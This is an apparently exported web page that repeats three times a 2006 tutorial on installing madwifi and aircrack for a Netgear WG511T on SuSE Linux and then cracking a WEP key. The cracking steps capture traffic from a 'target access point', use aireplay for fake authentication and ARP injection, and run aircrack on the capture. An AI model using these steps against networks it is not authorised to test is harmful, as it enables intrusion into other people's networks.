<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p><a name="Packet_and_driver_installation:"></a></p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <a name="1564144518" href="http://amazon.de/gp/product/1564144518?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=1564144518&amp;adid=efe27fa9-58a5-4c17-809c-d8d487ef0183" target="_blank">your system</a> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <a name="B000EQ44L6" href="http://amazon.de/gp/product/B000EQ44L6?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=B000EQ44L6&amp;adid=70b90bb3-39ff-407f-9a9d-abf695b07720" target="_blank">the following</a> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a name=""></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <a name="B0001FXB14" href="http://amazon.de/gp/product/B0001FXB14?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=B0001FXB14&amp;adid=68d7bb00-ce5a-44be-b7e9-360798861b60" target="_blank">WG511T</a> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/annotation/21/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="page" type="annotation" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:17:55 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/annotation/126/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="page" type="annotation" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/860/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="parent_guid" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[69]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/859/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="write_access_id" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[0]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1498/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[crack]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1497/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[wep]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1496/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[suse]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1495/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[wg511t]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/metadata/1499/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="tags" type="metadata" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Mon, 22 Dec 2008 14:52:20 +0100" ><![CDATA[it security]]></metadata>
</odd>